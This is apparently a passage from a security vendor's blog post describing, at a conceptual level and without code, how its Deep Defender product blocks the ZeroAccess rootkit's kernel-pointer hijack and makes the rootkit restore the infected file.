You did not miss part of this article. The interesting point is that Deep Defender did not have to do any custom repairs to clean this threat. It just blocked in real time the core functionality of the rootkit. Let’s revisit the attack strategy to understand what happened.


When the rootkit attempted to hijack the DeviceExtension pointer in Step 5, Deep Defender’s real-time kernel-memory protection saw the change, recognized it as a malicious attempt to modify a critical structure, and blocked it. With the hook gone, the rootkit could not hijack the disk i/o path, which means it could not store any files in its “protected” folder and could not survive any reboots without getting noticed. It certainly cannot forge the view of the file anymore. But the most interesting part is that blocking the hijack actually redirected the rootkit’s write attempt in Step 7 to its original location. So in Step 8 the clean image overwrites the very file the rootkit had just infected from user mode, forcing the rootkit to clean up after itself. After a reboot, the system is back in a clean state.
This strategy from Deep Defender works against all the current ZeroAccess variants. It would be challenging for the rootkit authors to fully bypass this defense without either leaving the system in a corrupted state or being noticed by security tools, which would catch them red-handed once they could no longer forge the view of the file.